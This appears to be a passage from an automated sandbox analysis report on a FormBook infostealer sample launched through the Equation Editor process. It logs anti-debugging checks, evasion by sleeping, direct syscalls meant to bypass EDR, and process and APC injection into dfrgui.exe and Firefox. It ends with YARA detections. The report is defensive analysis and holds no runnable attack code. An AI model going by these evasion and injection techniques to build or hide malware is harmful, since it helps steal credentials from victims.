            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: 300000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: 23A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: 470000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DF0101 rdtsc 6_2_00DF0101
            Source: C:\Users\user\AppData\Roaming\loud89334.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeWindow / User API: threadDelayed 9811Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\dfrgui.exeAPI coverage: 2.5 %
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2692Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scr TID: 3108Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3308Thread sleep count: 148 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3308Thread sleep time: -296000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3548Thread sleep time: -420000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3308Thread sleep count: 9811 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exe TID: 3308Thread sleep time: -19622000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3280Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe TID: 3468Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E18064 sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,8_2_61E18064
            Source: C:\Users\user\AppData\Roaming\loud89334.scrThread delayed: delay time: 922337203685477Jump to behavior
            Source: loud89334.scr, 00000005.00000000.359382718.0000000000AB2000.00000020.00000001.01000000.00000004.sdmp, dfrgui.exe, 00000008.00000002.635447198.0000000000660000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.636013778.000000000294C000.00000004.10000000.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000000.419606909.00000000033CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.478820963.000000000067C000.00000004.80000000.00040000.00000000.sdmp, loudzx[1].scr.2.dr, loud89334.scr.2.drBinary or memory string: flCPc3dp~JrNCRhgfs_YrhCRhHf{oJs
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DF0101 rdtsc 6_2_00DF0101
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00418BA3 LdrLoadDll,6_2_00418BA3
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D900EA mov eax, dword ptr fs:[00000030h]6_2_00D900EA
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00D90080 mov ecx, dword ptr fs:[00000030h]6_2_00D90080
            Source: C:\Users\user\AppData\Roaming\loud89334.scrCode function: 6_2_00DB26F8 mov eax, dword ptr fs:[00000030h]6_2_00DB26F8
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: 5.2.loud89334.scr.23f79d0.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.loud89334.scr.23f79d0.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
            Source: 5.2.loud89334.scr.23f79d0.3.raw.unpack, vTOBOpTyAAvQkvZvwvxLfhLDrUkCOfiQETyyQECGGfUQGE.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQueryInformationProcess: Direct from: 0x774CFAFAJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtCreateUserProcess: Direct from: 0x774D093EJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtCreateKey: Direct from: 0x774CFB62Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQuerySystemInformation: Direct from: 0x774D20DEJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQueryDirectoryFile: Direct from: 0x774CFDBAJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtWriteVirtualMemory: Direct from: 0x774D213EJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtCreateFile: Direct from: 0x774D00D6Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetTimer: Direct from: 0x774D021AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtOpenFile: Direct from: 0x774CFD86Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetInformationThread: Direct from: 0x774E9893Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtOpenKeyEx: Direct from: 0x774CFA4AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtAllocateVirtualMemory: Direct from: 0x774CFAE2Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtResumeThread: Direct from: 0x774D008DJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtOpenKeyEx: Direct from: 0x774D103AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtUnmapViewOfSection: Direct from: 0x774CFCA2Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtDelayExecution: Direct from: 0x774CFDA1Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetInformationProcess: Direct from: 0x774CFB4AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetInformationThread: Direct from: 0x774CF9CEJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtReadFile: Direct from: 0x774CF915Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtMapViewOfSection: Direct from: 0x774CFC72Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\AppData\Roaming\loud89334.scrMemory written: C:\Users\user\AppData\Roaming\loud89334.scr base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Roaming\loud89334.scrSection loaded: NULL target: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\loud89334.scr protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeSection loaded: NULL target: C:\Windows\SysWOW64\dfrgui.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\dfrgui.exeThread APC queued: target process: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\loud89334.scrProcess created: C:\Users\user\AppData\Roaming\loud89334.scr "C:\Users\user\AppData\Roaming\loud89334.scr"Jump to behavior
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000002.635679196.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000000.391608670.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635387386.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000002.635679196.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000000.391608670.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635387386.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000002.635679196.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 00000007.00000000.391608670.00000000013C0000.00000002.00000001.00040000.00000000.sdmp, sQNFFcxirzZbXqUULewCRS.exe, 0000000C.00000002.635387386.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
            Source: C:\Users\user\AppData\Roaming\loud89334.scrQueries volume information: C:\Users\user\AppData\Roaming\loud89334.scr VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\hrzxgdw.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abr0vjm0.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeCode function: 8_2_61E89CA0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,8_2_61E89CA0
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.loud89334.scr.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.635052346.0000000000250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.634933640.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.479085527.0000000002AB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
